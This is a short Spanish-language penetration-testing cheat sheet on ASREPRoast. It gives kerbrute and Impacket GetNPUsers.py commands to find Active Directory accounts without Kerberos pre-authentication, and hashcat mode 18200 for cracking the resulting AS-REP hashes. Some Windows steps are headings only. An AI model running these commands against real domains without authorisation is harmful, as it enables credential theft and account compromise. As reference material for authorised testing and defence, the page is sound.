ASREPRoast
Descripción
Es posible obtener el Ticket Granting Ticket (TGT) para cualquier cuenta que tenga habilitada la configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH).
Linux/Unix
Enumeración de usuarios con DONT_REQ_PREAUTH habilitado.
Kerbrute
kerbrute userenum -d <ACME.LOCAL> --dc <IP-address-DC> <wordlists><wordlists> = ruta de wordlist de nombres de usuarios de dominio.
Impacket
GetNPUsers.py <ACME.LOCAL>/ -dc-ip <IP-address-DC> -no-pass -usersfile valid-ad-users.txtHashcat
Cracking de AS-REP.
hashcat -m 18200 as-rep.txt <path-wordlist>John the Ripper
Cracking de AS-REP.
Windows
Enumeración de usuarios con DONT_REQ_PREAUTH habilitado.
Obtención de AS-REP de usuario.
Obtención de AS-REP de todos los usuarios.
Habilitar configuración "Do not require Kerberos pre-authentication" (DONT_REQ_PREAUTH) para un usuario.
Última actualización
¿Te fue útil?